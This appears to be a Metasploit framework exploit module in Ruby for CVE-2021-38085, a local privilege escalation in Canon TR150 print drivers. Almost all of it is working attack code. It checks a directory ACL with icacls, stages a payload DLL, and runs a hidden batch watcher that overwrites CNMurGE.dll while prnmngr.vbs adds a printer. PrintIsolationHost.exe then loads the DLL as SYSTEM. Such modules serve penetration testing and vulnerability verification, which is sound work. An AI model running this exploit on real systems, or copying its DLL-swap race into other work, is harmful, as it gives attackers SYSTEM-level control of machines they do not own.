Path: blob/master/modules/exploits/windows/local/canon_driver_privesc.rb
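##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  # Install directory created by the Canon TR150 driver package.
  DRIVER_DIR = 'C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series'.freeze
  # Language-module directory whose ACL is inspected and whose DLL gets replaced.
  LANGUAGE_DIR = "#{DRIVER_DIR}\\LanguageModules\\040C".freeze
  # DLL that PrintIsolationHost.exe loads while a printer is being added.
  DLL_NAME = 'CNMurGE.dll'.freeze
  # Built-in printer management script used to add/delete the printer. This is the
  # en-US location; on a localized Windows install the script may live under a
  # different locale folder, in which case add_printer fails with NotFound.
  PRNMNGR_PATH = 'C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs'.freeze
  # Driver name passed to prnmngr.vbs -m.
  DRIVER_NAME = 'Canon TR150 series'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Canon Driver Privilege Escalation',
        'Description' => %q{
          Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files
          within the "CanonBJ" directory and its subdirectories. By overwriting the DLL at
          C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C\CNMurGE.dll
          with a malicious DLL at the right time whilst running the C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs
          script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program,
          which runs as NT AUTHORITY\SYSTEM, to successfully load the malicious DLL. Successful exploitation
          will grant attackers code execution as the NT AUTHORITY\SYSTEM user.

          This module leverages the prnmngr.vbs script
          to add and delete printers. Multiple runs of this
          module may be required given successful exploitation
          is time-sensitive.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Jacob Baines', # discovery, PoC, module
          'Shelby Pace' # original Ricoh module
        ],
        'References' => [
          ['CVE', '2021-38085'],
        ],
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ],
        'Targets' => [
          [
            'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
          ]
        ],
        'Notes' => {
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'Stability' => [ SERVICE_RESOURCE_LOSS ]
        },
        'DisclosureDate' => '2021-08-07',
        'DefaultTarget' => 0,
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_process_execute
            ]
          }
        }
      )
    )

    self.needs_cleanup = true
  end

  # Vulnerability check.
  #
  # Returns Safe when the driver directory is missing or the language directory does not
  # grant BUILTIN\Users full control, Detected when the driver directory exists but is
  # empty (driver installed, no printer added yet) and Appears otherwise. As a side
  # effect, @driver_path is set to the language directory for exploit/add_printer.
  def check
    @driver_path = ''

    return CheckCode::Safe('No Canon TR150 driver directory found') unless directory?(DRIVER_DIR)

    # The original guarded on `entries.length`; 0 is truthy in Ruby, so the Detected
    # branch could never fire. `empty?` is the intended condition.
    entries = Array(dir(DRIVER_DIR))
    if entries.empty?
      return CheckCode::Detected("Detected Canon driver directory, but no language files. Its likely the driver is installed but a printer hasn't been added yet")
    end

    @driver_path = LANGUAGE_DIR

    # icacls prints ACEs such as `BUILTIN\Users:(I)(OI)(CI)(F)`; we look for full control
    # on the directory, inherited or explicit. The group name is the English one, so
    # localized Windows builds (e.g. "Benutzer", "Utilisateurs") will be reported Safe
    # even when the ACL is weak — a false negative, not a false positive.
    acl_output = cmd_exec("icacls \"#{@driver_path}\"").to_s
    unless acl_output.match?(/\\Users:(?:\(I\))?\(OI\)\(CI\)\(F\)/)
      return CheckCode::Safe("#{@driver_path} directory does not exist or does not grant Users full permissions")
    end

    vprint_status("Vulnerable language driver directory: #{@driver_path}")
    CheckCode::Appears('Canon language driver directory grants Users full permissions')
  end

  # Stages the payload DLL in %TEMP%, starts a hidden batch watcher that copies it over
  # the driver's CNMurGE.dll as soon as the printer installer modifies that file, then runs
  # prnmngr.vbs to add a printer so PrintIsolationHost.exe (SYSTEM) loads the payload.
  #
  # @param driver_name [String] printer driver name handed to prnmngr.vbs -m
  # Fails via fail_with when prnmngr.vbs is missing or a Meterpreter request errors.
  def add_printer(driver_name)
    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)

    dll_path = "#{@driver_path}\\#{DLL_NAME}"
    temp_path = expand_path("%TEMP%\\#{DLL_NAME}")
    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")

    # The watcher clears the archive attribute on the target DLL, spins until the
    # installer rewrites it (archive bit set again), waits one second, then overwrites
    # it with the payload and clears the bit again. The poll loop has no exit condition:
    # if the installer never touches the DLL, the hidden cmd.exe presumably keeps spinning
    # until its .bat is removed. This is a race, so it won't always succeed.
    bat_file = <<~HEREDOC
      attrib -a "#{dll_path}"
      :repeat
      for %%i in ("#{dll_path}") do echo %%~ai | find "a" >nul || goto :repeat
      timeout /t 1
      copy /y "#{temp_path}" "#{dll_path}"
      attrib -a "#{dll_path}"
    HEREDOC

    print_status("Dropping batch script to #{bat_file_path}")
    write_file(bat_file_path, bat_file)

    print_status("Writing DLL file to #{temp_path}")
    write_file(temp_path, generate_payload_dll)
    # Only the staging copies are registered for removal. The payload written over
    # dll_path replaces the vendor DLL and is not restored or deleted (ARTIFACTS_ON_DISK).
    register_files_for_cleanup(bat_file_path, temp_path)

    vprint_status('Executing the batch script...')
    client.sys.process.execute("cmd.exe /c \"#{bat_file_path}\"", nil, { 'Hidden' => true })

    print_status("Adding printer #{@printer_name}...")
    cmd_exec("cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\"")
  rescue Rex::Post::Meterpreter::RequestError => e
    fail_with(Failure::Unknown, "#{e.class} #{e.message}")
  end

  # Entry point: validates the session and payload, resolves the target directory and
  # triggers the printer add that races the DLL load.
  def exploit
    fail_with(Failure::None, 'Already running as SYSTEM') if is_system?

    fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'

    if sysinfo['Architecture'] != payload.arch.first
      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target machine')
    end

    # @driver_path is normally populated by check (AutoCheck). With AutoCheck disabled
    # the original built "\CNMurGE.dll" from a nil path and wrote to the drive root;
    # fall back to the known language directory and insist that it exists.
    if @driver_path.to_s.empty?
      fail_with(Failure::NotFound, "#{LANGUAGE_DIR} not found") unless directory?(LANGUAGE_DIR)
      @driver_path = LANGUAGE_DIR
    end

    @printer_name = Rex::Text.rand_text_alpha(5..9)
    @script_path = PRNMNGR_PATH

    add_printer(DRIVER_NAME)
  end

  # Removes the printer added by exploit, then defers to FileDropper (via super) to
  # delete the staged batch script and %TEMP% DLL. The previous override never called
  # super, so register_files_for_cleanup had no effect; it also ran the delete command
  # with nil names when exploit bailed out early, which the guard below avoids.
  def cleanup
    if @printer_name && @script_path
      print_status("Deleting printer #{@printer_name}")
      sleep(3)
      delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
      client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
    end
    super
  end
end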